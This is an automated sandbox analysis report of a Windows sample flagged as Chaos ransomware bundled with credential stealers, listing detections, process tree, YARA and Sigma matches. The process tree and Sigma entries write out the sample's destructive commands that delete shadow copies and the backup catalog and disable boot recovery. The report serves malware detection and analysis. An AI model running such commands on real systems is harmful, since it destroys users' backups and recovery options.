Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4wx72yFLka.exe

Overview

General Information

Sample name:4wx72yFLka.exe
renamed because original name is a hash value
Original sample name:7737fb5fa7440206dbbd7dbeb8222a2851caf6210005e37d6d5d765081940e9a.exe
Analysis ID:1504078
MD5:fe194bd31f2388a09bbef24ddaa212ce
SHA1:cb01c1cb0a2fc192c28b3d7864e739d9d8575e08
SHA256:7737fb5fa7440206dbbd7dbeb8222a2851caf6210005e37d6d5d765081940e9a
Tags:exemaster-repogen-vercel-app
Infos:

Detection

Python Stealer, CStealer, Chaos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
Yara detected CStealer
Yara detected Chaos Ransomware
.NET source code contains very large strings
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to disable the Task Manager (.Net Source)
Creates files inside the volume driver (system volume information)
Deletes itself after installation
Deletes shadow drive data (may be related to ransomware)
Deletes the backup plan of Windows
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Drops PE files with benign system names
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses bcdedit to modify the Windows boot settings
Writes many files with high entropy
Yara detected Generic Python Stealer
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a Chrome extension
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4wx72yFLka.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\4wx72yFLka.exe" MD5: FE194BD31F2388A09BBEF24DDAA212CE)
    • Mai.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\Mai.exe" MD5: 14F564392EEC0B9EDA9530411159057C)
      • Mai.exe (PID: 7740 cmdline: "C:\Users\user\Desktop\Mai.exe" MD5: 14F564392EEC0B9EDA9530411159057C)
        • cmd.exe (PID: 7868 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • main.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\main.exe" MD5: 840EB9E50C131322605C5EA90AE1312F)
      • svchost.exe (PID: 7772 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 840EB9E50C131322605C5EA90AE1312F)
        • cmd.exe (PID: 7936 cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • vssadmin.exe (PID: 7976 cmdline: vssadmin delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
          • WMIC.exe (PID: 8164 cmdline: wmic shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • cmd.exe (PID: 1384 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • bcdedit.exe (PID: 3712 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
          • bcdedit.exe (PID: 5332 cmdline: bcdedit /set {default} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
        • cmd.exe (PID: 3404 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wbadmin.exe (PID: 2848 cmdline: wbadmin delete catalog -quiet MD5: F2AA55885A2C014DA99F1355F3F71E4A)
        • notepad.exe (PID: 7020 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • svchost.exe (PID: 8060 cmdline: C:\Windows\System32\svchost.exe -k swprv MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wbengine.exe (PID: 5368 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 17270A354A66590953C4AAC1CF54E507)
  • vdsldr.exe (PID: 4068 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: 472A05A6ADC167E9E5D2328AD98E3067)
  • vds.exe (PID: 6680 cmdline: C:\Windows\System32\vds.exe MD5: 0781CE7ECCD9F6318BA72CD96B5B8992)
  • svchost.exe (PID: 7008 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 840EB9E50C131322605C5EA90AE1312F)
    • cmd.exe (PID: 7628 cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 5736 cmdline: vssadmin delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
      • WMIC.exe (PID: 7988 cmdline: wmic shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • cmd.exe (PID: 6136 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bcdedit.exe (PID: 8016 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • bcdedit.exe (PID: 5872 cmdline: bcdedit /set {default} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
    • cmd.exe (PID: 4940 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wbadmin.exe (PID: 6380 cmdline: wbadmin delete catalog -quiet MD5: F2AA55885A2C014DA99F1355F3F71E4A)
    • notepad.exe (PID: 8000 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • svchost.exe (PID: 3676 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3828 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 840EB9E50C131322605C5EA90AE1312F)
  • notepad.exe (PID: 7068 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DynamicStealerDynamic Stealer is a Github Project C# written code by L1ghtN4n. This code collects passwords and uploads these to Telegram. According to Cyble this Eternity Stealer leverages code from this project and also Jester Stealer could be rebranded from it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dynamicstealer
NameDescriptionAttributionBlogpost URLsLink
ChaosIn-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.chaos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_Chaos_1Yara detected Chaos RansomwareJoe Security
    C:\Users\user\AppData\Roaming\svchost.exeINDICATOR_SUSPICOUS_EXE_References_VEEAMDetects executables containing many references to VEEAM. Observed in ransomwareunknown
    • 0x4f94:$s1: VeeamNFSSvc
    • 0x4f42:$s9: VeeamTransportSvc
    • 0x4f66:$s10: VeeamDeploymentService
    C:\Users\user\AppData\Roaming\svchost.exeMALWARE_Win_ChaosDetects Chaos ransomwareditekSHen
    • 0x50dc:$s3: C:\Users\
    • 0x149cb9:$s4: read_it.txt
    • 0x149cf5:$s6: (?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})
    • 0x30c0:$s7: checkSpread
    • 0x3114:$s7: checkSleep
    • 0x315e:$s7: checkAdminPrivilage
    • 0x3172:$s7: checkdeleteShadowCopies
    • 0x318a:$s7: checkdisableRecoveryMode
    • 0x31a3:$s7: checkdeleteBackupCatalog
    • 0x341f:$s8: deleteShadowCopies
    • 0x3432:$s8: disableRecoveryMode
    • 0x3446:$s8: deleteBackupCatalog
    • 0x30cc:$s9: spreadName
    • 0x30e8:$s10: processName
    • 0x32b4:$s11: sleepOutOfTempFolder
    • 0x32d7:$s12: AlreadyRunning
    • 0x332d:$s14: encryptDirectory
    • 0x3a44:$s14: encryptDirectory
    • 0x3a5b:$s14: encryptDirectory
    • 0x3a8c:$s14: encryptDirectory
    • 0x34bc:$s16: intpreclp

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CStealerYara detected CStealerJoe Security
      00000003.00000002.1536320956.00000000126E8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Chaos_1Yara detected Chaos RansomwareJoe Security
        00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CStealerYara detected CStealerJoe Security
          00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CStealerYara detected CStealerJoe Security
            00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CStealerYara detected CStealerJoe Security
              Click to see the 12 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.2.main.exe.126e8a00.1.raw.unpackJoeSecurity_Chaos_1Yara detected Chaos RansomwareJoe Security
                3.2.main.exe.126e8a00.1.raw.unpackDestructive_Ransomware_Gen1Detects destructive malwareFlorian Roth
                • 0x4b44:$x1: /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                • 0x4acb:$x2: delete shadows /all /quiet
                • 0x4c10:$x3: delete catalog -quiet
                3.2.main.exe.126e8a00.1.raw.unpackINDICATOR_SUSPICOUS_EXE_References_VEEAMDetects executables containing many references to VEEAM. Observed in ransomwareunknown
                • 0x4f94:$s1: VeeamNFSSvc
                • 0x4f42:$s9: VeeamTransportSvc
                • 0x4f66:$s10: VeeamDeploymentService
                3.2.main.exe.126e8a00.1.raw.unpackMALWARE_Win_ChaosDetects Chaos ransomwareditekSHen
                • 0x50dc:$s3: C:\Users\
                • 0x30c0:$s7: checkSpread
                • 0x3114:$s7: checkSleep
                • 0x315e:$s7: checkAdminPrivilage
                • 0x3172:$s7: checkdeleteShadowCopies
                • 0x318a:$s7: checkdisableRecoveryMode
                • 0x31a3:$s7: checkdeleteBackupCatalog
                • 0x341f:$s8: deleteShadowCopies
                • 0x3432:$s8: disableRecoveryMode
                • 0x3446:$s8: deleteBackupCatalog
                • 0x30cc:$s9: spreadName
                • 0x30e8:$s10: processName
                • 0x32b4:$s11: sleepOutOfTempFolder
                • 0x32d7:$s12: AlreadyRunning
                • 0x332d:$s14: encryptDirectory
                • 0x3a44:$s14: encryptDirectory
                • 0x3a5b:$s14: encryptDirectory
                • 0x3a8c:$s14: encryptDirectory
                • 0x34bc:$s16: intpreclp
                • 0x358c:$s18: textToEncrypt
                3.2.main.exe.126e8a00.1.unpackJoeSecurity_Chaos_1Yara detected Chaos RansomwareJoe Security
                  Click to see the 5 entries

                  Sigma Signatures

                  Operating System Destruction

                  barindex
                  Sigma detected: Delete shadow copy via WMIC
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, CommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7772, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, ProcessId: 7936, ProcessName: cmd.exe

                  System Summary

                  barindex
                  Sigma detected: Files With System Process Name In Unsuspected Locations
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\main.exe, ProcessId: 7676, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                  Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: vssadmin delete shadows /all /quiet, CommandLine: vssadmin delete shadows /all /quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7936, ParentProcessName: cmd.exe, ProcessCommandLine: vssadmin delete shadows /all /quiet, ProcessId: 7976, ProcessName: vssadmin.exe
                  Sigma detected: System File Execution Location Anomaly
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe" , ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7676, ParentProcessName: main.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7772, ProcessName: svchost.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7772, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateTask
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7772, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt
                  Sigma detected: Suspicious Copy From or To System Directory
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, CommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7772, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, ProcessId: 7936, ProcessName: cmd.exe
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe" , ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7676, ParentProcessName: main.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7772, ProcessName: svchost.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe" , ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7676, ParentProcessName: main.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7772, ProcessName: svchost.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: 4wx72yFLka.exeReversingLabs: Detection: 63%
                  Source: 4wx72yFLka.exeVirustotal: Detection: 50%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                  Machine Learning detection for sample
                  Source: 4wx72yFLka.exeJoe Sandbox ML: detected
                  Source: 4wx72yFLka.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\LICENSE.txtJump to behavior
                  Source: 4wx72yFLka.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4wx72yFLka.exe, 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp, 4wx72yFLka.exe, 00000000.00000000.1441129724.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Mai.exe, 00000004.00000002.2728305231.00007FFBA4840000.00000002.00000001.01000000.00000021.sdmp
                  Source: Binary string: ucrtbase.pdb source: Mai.exe, 00000004.00000002.2739998165.00007FFBAA383000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: Mai.exe, 00000004.00000002.2742453424.00007FFBBB3F6000.00000002.00000001.01000000.0000001C.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Mai.exe, 00000002.00000003.1470693869.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Mai.exe, 00000002.00000003.1470693869.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Mai.exe, 00000002.00000003.1470832541.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Mai.exe, 00000004.00000002.2744924304.00007FFBBC703000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Mai.exe, 00000004.00000002.2743543663.00007FFBBB430000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: Mai.exe, 00000004.00000002.2729839617.00007FFBA48F5000.00000002.00000001.01000000.0000001A.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2740981178.00007FFBB189C000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2741399937.00007FFBB4C47000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: .core.pdb.ico.pas source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000003.00000002.1536320956.00000000126FB000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: Mai.exe, 00000004.00000002.2739578308.00007FFBAA2B2000.00000002.00000001.01000000.0000001D.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Mai.exe, 00000004.00000002.2744320710.00007FFBBC343000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2740981178.00007FFBB189C000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2743176321.00007FFBBB40D000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: ucrtbase.pdbUGP source: Mai.exe, 00000004.00000002.2739998165.00007FFBAA383000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Mai.exe, 00000004.00000002.2741731661.00007FFBB6298000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Mai.exe, 00000004.00000002.2727988873.00007FFBA471E000.00000002.00000001.01000000.00000022.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Mai.exe, 00000004.00000002.2708525188.000001995DDB0000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Mai.exe, 00000002.00000003.1470832541.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\libssl-3.pdb source: Mai.exe, 00000004.00000002.2729839617.00007FFBA48F5000.00000002.00000001.01000000.0000001A.sdmp
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
